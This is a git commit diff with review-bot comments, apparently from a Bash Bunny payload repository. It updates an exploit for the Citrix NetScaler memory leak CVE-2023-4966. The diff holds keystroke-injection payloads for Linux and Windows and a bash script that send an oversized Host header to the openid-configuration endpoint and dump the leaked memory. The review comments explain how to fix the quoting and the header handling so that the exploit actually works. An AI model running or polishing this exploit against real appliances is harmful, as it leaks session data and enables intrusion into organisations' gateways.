Adapted to the use of variables

[+] Added vars
[+] Attackmode
[-] Img replaced with a link
[+] README adapted to the new payload
pull/671/head
Aleff 2024-06-06 16:32:36 +02:00
parent bc056509f0
commit 9892715933
5 changed files with 29 additions and 32 deletions

View File

@ -43,17 +43,18 @@ The following supported versions of NetScaler ADC and NetScaler Gateway are affe
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
![](./assets/1.png)
![](https://i.ibb.co/x7SRvGf/1.png)
***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
## Settings
The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.
```DuckyScript
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
```plaintext
HOSTNAME='192.168.1.200'
...
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
```
## Payload Description Windows
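Review bot: the screenshot at the top of this hunk now points at https://i.ibb.co/x7SRvGf/1.png instead of `./assets/1.png`; a third-party image host can expire or start serving different content, so the copy under version control in the repo's assets folder is the one the README should reference. In the Settings paragraph, saying what `HOSTNAME` is would help the reader: it is the shell variable assigned at the top of payload.txt (`HOSTNAME='192.168.1.200'`), and editing that single assignment is the whole configuration step, which the `plaintext` snippet with its `...` shows but the prose does not state.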
@ -82,10 +83,10 @@ Here, a variable `$headers` is created as a hashtable containing the HTTP header
$headers = @{ 'Host' = $header_value }
```
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
```powershell
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
```
Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
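Review bot: the sentence "`$HOSTNAME` is a DuckyScript variable that should be replaced with the actual value before executing the script" is no longer accurate after this change: the value is assigned once at the top of payload.txt and substituted by the Bash Bunny's shell when the `QUACK STRING` line runs, so nothing in this line is edited by hand. The PowerShell snippet as printed is also not what reaches the target; `$HOSTNAME` is not a PowerShell variable, so a reader who pastes the line gets `https:///oauth/idp/.well-known/openid-configuration`. Show the expanded form (`https://192.168.1.200/...`) or say explicitly that the payload fills the value in before typing.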
@ -130,7 +131,7 @@ headers="-H 'Host:$header_value'"
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
```bash
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
```
In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
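Review bot: the description at the end of this hunk says the check looks at "the first three characters of the response" for "200", but the `curl -s -k ...` line stores only the response body (no `-i`, no `-w '%{http_code}'`), and the body of this endpoint is JSON, so the documented test cannot match on a successful request. Either document what is actually compared or change the command, e.g. `status=$(curl -s -k -H "Host: $header_value" -o response.bin -w '%{http_code}' "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)` and compare `$status`. Note also that `HOSTNAME` is the variable bash itself sets to the local machine name; a name such as `TARGET` avoids shadowing it.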
@ -139,7 +140,7 @@ In this block, it checks if the exit status of the cURL command is 0 (indicating
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "The #HOSTNAME is vulnerable!"
echo "The $HOSTNAME is vulnerable!"
echo "--- End ---"
else
echo "Could not dump memory"
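Review bot: `echo "The $HOSTNAME is vulnerable!"` renders as "The 192.168.1.200 is vulnerable!"; drop "The" or write `echo "Target $HOSTNAME appears vulnerable"`. In the same block, the condition uses `echo $response` unquoted while the dump line quotes it; quote both, since the body contains spaces and may contain glob characters that the unquoted form would expand.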
@ -148,7 +149,7 @@ fi
## Script sh
The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
Example Execution:
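Review bot: "target HOSTNAME" in the script.sh description turns a plain noun into what looks like an environment variable the user must export, while script.sh takes the value positionally as `$1`. Keep "target hostname or IP (no scheme)" here, and replace "perform a specific action in the exploit" with what the script does with it: the value is inserted into the URL of the curl request.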
@ -166,14 +167,12 @@ After assigning execute permissions, the above command allows the user to run th
## Sources
- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
## Credits
<h2 align="center"> Aleff</h2>
<h2 align="center">Aleff</h2>
<div align=center>
<table>
<tr>
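Review bot: dropping the Detect Ready and Passive Windows Detect references matches the payloads now using `ATTACKMODE HID` with a fixed `QUACK DELAY 3000` instead of a Rubber Ducky readiness check, but the README should then mention that the 3000 ms wait may need tuning, since nothing in the payload waits for the host to enumerate the keyboard. Switching the list from `[1]`..`[4]` to `1)`, `2)` is fine provided no body text still cites a bracketed number.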

View File

@ -3,29 +3,29 @@
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
* REM GNU/Linux Version
ATTACKMODE HID
QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'
QUACK DELAY 3000
QUACK CTRL-ALT t
QUACK DELAY 1000
QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
QUACK ENTER
QUACK DELAY 500
QUACK STRING headers="-H 'Host:$header_value'"
QUACK ENTER
QUACK DELAY 500
* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
QUACK ENTER
QUACK DELAY 500
QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
QUACK ENTER
QUACK DELAY 500
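Review bot: on `QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)`, everything except `$HOSTNAME` is also processed by the Bunny's own bash before QUACK receives the text: `$(curl ...)` runs on the Bunny (which has no network path in HID mode) and is replaced by its empty output, `$headers` is unset there and disappears, and the double quotes are removed, so the target receives little more than `response=`. The same applies to `$header_value`, `$?` and `$(echo $response | cut -c 1-3)` on the surrounding lines, and `QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')` makes the Bunny run that pipeline itself and type 24576 characters. Single-quote each typed line and splice in only the variable that should expand, e.g. `QUACK STRING 'response=$(curl -s -k -H "$headers" "https://'"$HOSTNAME"'/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)'`. Separately, `QUACK REM VARIABLES` pushes a DuckyScript comment through the injector; a `#` bash comment is the natural form in payload.txt.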

View File

@ -1,12 +1,12 @@
#!/bin/bash
hostname="$1" # first parameter
HOSTNAME="$1" # first parameter
header_value=$(yes a | head -n 24576 | tr -d '\n')
headers="-H 'Host:$header_value'"
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
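Review bot: `headers="-H 'Host:$header_value'"` followed by `curl -H "$headers"` does not set the Host header: `-H` is already on the command line, so curl takes the literal string `-H 'Host:aaaa...'` as the header, splits it at the first colon into a header named `-H 'Host` with the a's as its value, and leaves the real Host header untouched. Write `curl -s -k -H "Host: $header_value" ...` instead. The rename to `HOSTNAME` also shadows the variable bash sets to the local machine name, and `$1` is used without a check; `TARGET="$1"` preceded by `[ -z "$1" ] && { echo "usage: $0 <host>"; exit 1; }` would be clearer and safer.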

View File

@ -8,7 +8,11 @@
* REM # #
* REM ##################################################################################
* REM Windows Version
ATTACKMODE HID
QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'
QUACK DELAY 3000
QUACK GUI r
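Review bot: the comment "Define replacing into the $HOSTNAME var your target" is hard to parse and does not say that the line below it is a bash assignment in payload.txt; "Set HOSTNAME below to the target Citrix ADC / Gateway address (IP or hostname, no scheme)" says what the user must do. As in the Linux payload, `HOSTNAME` shadows the variable bash sets to the Bunny's own hostname, and `QUACK REM VARIABLES` sends a DuckyScript comment through the injector where a `#` comment would do.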
@ -16,30 +20,24 @@ QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000
QUACK STRING $header_value = 'a' * 24576
QUACK ENTER
QUACK DELAY 500
QUACK STRING $header_value = $header_value -replace "\n", ""
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers="-H 'Host:$header_value'"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers = @{'Host' = $header_value}
QUACK ENTER
QUACK DELAY 500
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
QUACK ENTER
QUACK DELAY 500
QUACK STRING if ($response.Substring(0, 3) -eq "200") {
QUACK ENTER
QUACK DELAY 500
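Review bot: on `QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"`, `$uri` is an unset bash variable on the Bunny and vanishes, and the double quotes are stripped, so PowerShell on the target receives ` = https://192.168.1.200/...` and errors out; `$header_value`, `$headers` and `$response` on the neighbouring lines are lost the same way. Quote the typed text and splice in only `$HOSTNAME`: `QUACK STRING '$uri = "https://'"$HOSTNAME"'/oauth/idp/.well-known/openid-configuration"'`. Also, `Invoke-RestMethod` returns the parsed JSON object rather than a string beginning with a status code, so `$response.Substring(0, 3) -eq "200"` cannot succeed even once the lines are typed correctly; `Invoke-WebRequest` exposes `.StatusCode` and `.Content` for that check.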